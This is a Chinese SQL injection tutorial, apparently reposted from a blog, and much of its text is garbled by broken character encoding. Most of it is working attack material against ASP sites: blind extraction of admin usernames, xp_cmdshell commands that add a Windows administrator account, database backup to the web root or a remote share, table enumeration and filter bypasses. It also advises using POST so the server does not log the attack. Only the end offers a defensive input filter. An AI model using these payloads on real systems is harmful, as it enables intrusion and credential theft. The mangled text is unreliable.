Select * from 表名 where 字段=’连�l�剧�?and [查询条�g] and ‘�?’�?/font>

(C) 搜烦时没�q��o参数的，如keyword=关键字，SQL语句原貌大致如下�Q?br />Select * from 表名 where 字段like �?关键�?�?
注入的参��Cؓkeyword=�?and [查询条�g] and �?25�?’， ��x��生成语句�Q?br />Select * from 表名 where字段like �?�?and [查询条�g] and �?�?�?�?/font>

接着�Q�将查询条�g替换成SQL语句�Q�猜解表名，例如�Q?/font>

ID=49 And (Select Count(*) from Admin)>=0

如果��面��׃��ID=49的相同，说明附加条�g成立�Q�即表Admin存在�Q�反之，即不存在�Q�请牢记�q�种�Ҏ(gu��)��Q�。如此��@环，直至猜到表名为止�?/font>

表名猜出来后�Q�将Count(*)替换成Count(字段�?�Q�用同样的原理猜解字�D�名�?/font>

有�h会说�Q�这里有一些偶然的成分�Q�如果表名�v得很复杂没规律的�Q�那�Ҏ(gu��)��没得玩下去了。说得很对，�q�世界根本就不存�?00%成功的黑客技术，苍蝇不叮无缝的蛋�Q�无论多技术多高深的黑客，都是因�ؓ别�h的程序写得不严密或��用者保密意识不够，才有得下手�?/font>

有点跑题了，话说回来�Q�对于SQLServer的库�Q�还是有办法让程序告诉我们表名及字段名的�Q�我们在高�񔽋�中会做介绍�?br />
最后，在表名和列名猜解成功后，再��用SQL语句�Q�得出字�D늚��|��下面介绍一�U�最常用的方法－Ascii逐字解码法，虽然�q�种�Ҏ(gu��)��速度很慢�Q�但肯定是可行的�Ҏ(gu��)��?/font>

我们举个例子�Q�已知表Admin中存在username字段�Q�首先，我们取第一条记录，��试长度�Q?/font>

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

先说明原理：如果top 1的username长度大于0�Q�则条�g成立�Q�接着��是>1�?gt;2�?gt;3�q�样��试下去�Q�一直到条�g不成立�ؓ止，比如>7成立�Q?gt;8不成立，��是len(username)=8

　　当然没�h会笨得从0,1,2,3一个个��试�Q�怎么��h��比较快就看各自发挥了。在得到username的长度后�Q�用mid(username,N,1)截取�W�N位字�W�，再asc(mid(username,N,1))得到ASCII码，比如�Q?/font>

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步�~�小范围的方法得到第1位字�W�的ASCII码，注意的是英文和数字的ASCII码在1-128之间�Q�可以用折半法加速猜解，如果写成�E�序��试�Q�效率会有极大的提高�?/font>

�W�二节、Ｓ�Q�Ｌ注入常用函数

有SQL语言基础的�h�Q�在SQL注入的时候成功率比不熟�?zh��n)�的�h高很多。我们有必要提高一下自��q��SQL水��^�Q�特别是一些常用的函数及命令�?/font>

Access�Q�asc(字符) SQLServer�Q�unicode(字符)
作用�Q�返回某字符的ASCII�?/font>

Access�Q�chr(数字) SQLServer�Q�nchar(数字)
作用�Q�与asc相反�Q�根据ASCII码返回字�W?/font>

Access�Q�mid(字符�?N,L) SQLServer�Q�substring(字符�?N,L)
作用�Q�返回字�W�串从N个字�W��v长度为L的子字符�Ԍ��即N到N+L之间的字�W�串

Access�Q�abc(数字) SQLServer�Q�abc (数字)
作用�Q�返回数字的�l�对��|��在猜解汉字的时候会用到�Q?/font>

Access�Q�A between B And C SQLServer�Q�A between B And C
作用�Q�判断A是否界于B与C之间

�W�三节、中文处理方�?/font>

在注入中��到中文字符是常有的事，有些��Z��到中文字符��想打退堂鼓了。其实只要对中文的编码有所了解�Q�“中文恐惧症”很快可以克服。先说一点常识：

Access中，中文的ASCII码可能会出现负数�Q�取��负数后用abs()取绝对��|��汉字字符不变�?/font>

SQLServer中，中文的ASCII为正敎ͼ�但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()�q�回unicode��|��再用nchar函数取得对应的中文字�W��?/font>

了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜解范围大一点外�Q�方法是没什么两��L��?/font>

�?�U?��?/font>

看完入门��和�q�阶��后�Q�稍加练习，破解一般的�|�站是没问题了。但如果��到表名列名猜不刎ͼ�或程序作者过滤了一些特�D�字�W�，怎么提高注入的成功率�Q�怎么��h��高猜解效率？请大家接着往下看高�񔽋��?/font>

�W�一节、利用系�l�表注入SQLServer数据�?/font>

SQLServer是一个功能强大的数据库系�l�，与操作系�l�也有紧密的联系�Q�这�l�开发者带来了很大的方便，但另一斚w��Q�也为注入者提供了一个蟩板，我们先来看看几个具体的例子：

�? http://Site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

　　分号;在SQLServer中表�C�隔开前后两句语句�Q?-表示后面的语句�ؓ注释�Q�所以，�q�句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储�q�程xp_cmdshell�Q�这个存储过�E�用于调用系�l�命令，于是�Q�用net命��o新徏了用户名为name、密码�ؓpassword的windows的帐��P��接着�Q?/font>

�? http://Site/url.asp?id=1;exec master..xp_cmdshell "net localgroup administrators name /add"--

　　��新建的帐号name加入��理员组�Q�不用两分钟�Q�你已经拿到了系�l�最高权限！当然�Q�这�U�方法只适用于用sa�q�接数据库的情况�Q�否则，是没有权限调用xp_cmdshell的�?/font>

　　�? http://Site/url.asp?id=1 and db_name()>0

前面有个�c�M��的例子and user>0�Q�作用是获取�q�接用户名，db_name()是另一个系�l�变量，�q�回的是�q�接的数据库名�?/font>

�? http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db�?--

�q�是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的�l�对路径�Q�将数据库备份到Web目录下面�Q�再用HTTP把整个数据库��完完整整的下蝲回来�Q�所有的��理员及用户密码都一览无遗！在不知道�l�对路径的时候，�q�可以备份到�|�络地址的方法（�?/font> \\202.96.xx.xx\Share\1.db �Q�，但成功率不高�?/font>

　　�? http://Site/url.asp?id=1 and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0

前面说过�Q�sysobjects是SQLServer的系�l�表�Q�存储着所有的表名、视图、约束及其它对象�Q�xtype='U' and status>0�Q�表�C�用户徏立的表名�Q�上面的语句��第一个表名取出，�?比较大小�Q�让报错信息把表名暴露出来。第二、第三个表名怎么获取�Q�还是留�l�我们聪明的读者思考吧�?/font>

�? http://Site/url.asp?id=1 and (Select Top 1 col_name(object_id('表名'),1) from sysobjects)>0

从⑤拿到表名后，用object_id(‘表名�?获取表名对应的内部ID�Q�col_name(表名ID,1)代表该表的第1个字�D�名�Q�将1换成2,3,4...��可以逐个获取所猜解表里面的字段名�?/font>

　以上6�Ҏ(gu��)��我研�I�SQLServer注入半年多以来的心血�l�晶�Q�可以看出，对SQLServer的了解程度，直接影响着成功率及猜解速度。在我研�I�SQLServer注入之后�Q�我在开发方面的水��^也得到很大的提高�Q�呵呵，也许安全与开发本来就是相辅相成的吧�?/font>

�W�二节、绕�q�程序限制��l�注�?/font>

在入门篇提到�Q�有很多人喜�Ƣ用'��h��试注入漏�z�，所以也有很多�h用过�?��L��Ҏ(gu��)��来“防止”注入漏�z�，�q�也许能挡住一些入门者的��d��Q�但对SQL注入比较熟�?zh��n)�的�h�Q�还是可以利用相关的函数�Q�达到绕�q�程序限制的目的�?/font>

在“SQL注入的一般步骤”一节中�Q�我所用的语句�Q�都是经�q�我优化�Q�让其不包含有单引号的；在“利用系�l�表注入SQLServer数据库”中�Q�有些语句包含有'��P��我们举个例子来看看怎么攚w��这些语句：

��单的如where xtype='U'�Q�字�W�U对应的ASCII码是85�Q�所以可以用where xtype=char(85)代替�Q�如果字�W�是中文的，比如where name='用户'�Q�可以用where name=nchar(29992)+nchar(25143)代替�?/font>

�W�三节、经验小�l?/font>

1.有些��Z��q��oSelect、Update、Delete�q�些关键字，但偏偏忘记区分大��写�Q�所以大家可以用selecT�q�样��试一下�?/font>

2.在猜不到字段名时�Q�不妨看看网站上的登录表单，一般�ؓ了方便�v见，字段名都与表单的输入框取相同的名字�?/font>

3.特别注意�Q�地址栏的+号传入程序后解释为空��|��%2B解释�?��P��%25解释�?��P��具体可以参考URLEncode的相关介�l��?/font>

4.用Get�Ҏ(gu��)��注入�Ӟ��IIS会记录你所有的提交字符�Ԍ��对Post�Ҏ(gu��)��做则不记录，所以能用Post的网址��量不用Get�?/font>

5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用�q�种�Ҏ(gu��)��Q�只需要两者之间的区别卛_��Q�但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高�?/font>

�?�?�?�?/font>

SQL注入漏洞可谓是“千里之堤，溃于蚁穴”，�q�种漏洞在网上极为普遍，通常是由于程序员�Ҏ(gu��)��入不了解�Q�或者程序过滤不严格�Q�或者某个参数忘记检查导致。在�q�里�Q�我�l�大家一个函敎ͼ�代替ASP中的Request函数�Q�可以对一切的SQL注入Say NO�Q�函数如下：

Function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符�?br /> 'ParaType:参数�c�d��-数字�?1表示以上参数是数字，0表示以上参数为字�W?

       Dim Paravalue
       Paravalue=Request(ParaName)
       If ParaType=1 then
              If not isNumeric(Paravalue) then
                     Response.write "参数" & ParaName & "必须为数字型�Q?
                     Response.end
              End if
       Else
              Paravalue=replace(Paravalue,"'","''")
       End if
       SafeRequest=Paravalue
End function

文章到这里就�l�束了，不管你是安全人员、技术爱好者还是程序员�Q�我都希望本文能对你有所帮助�?br />摘自�Q?a id="ArticleContent1_ArticleContent1_AuthorBlogLink" target="_blank">http://blog.csdn.net/digituser/

freebird 2006-07-30 23:06 发表评论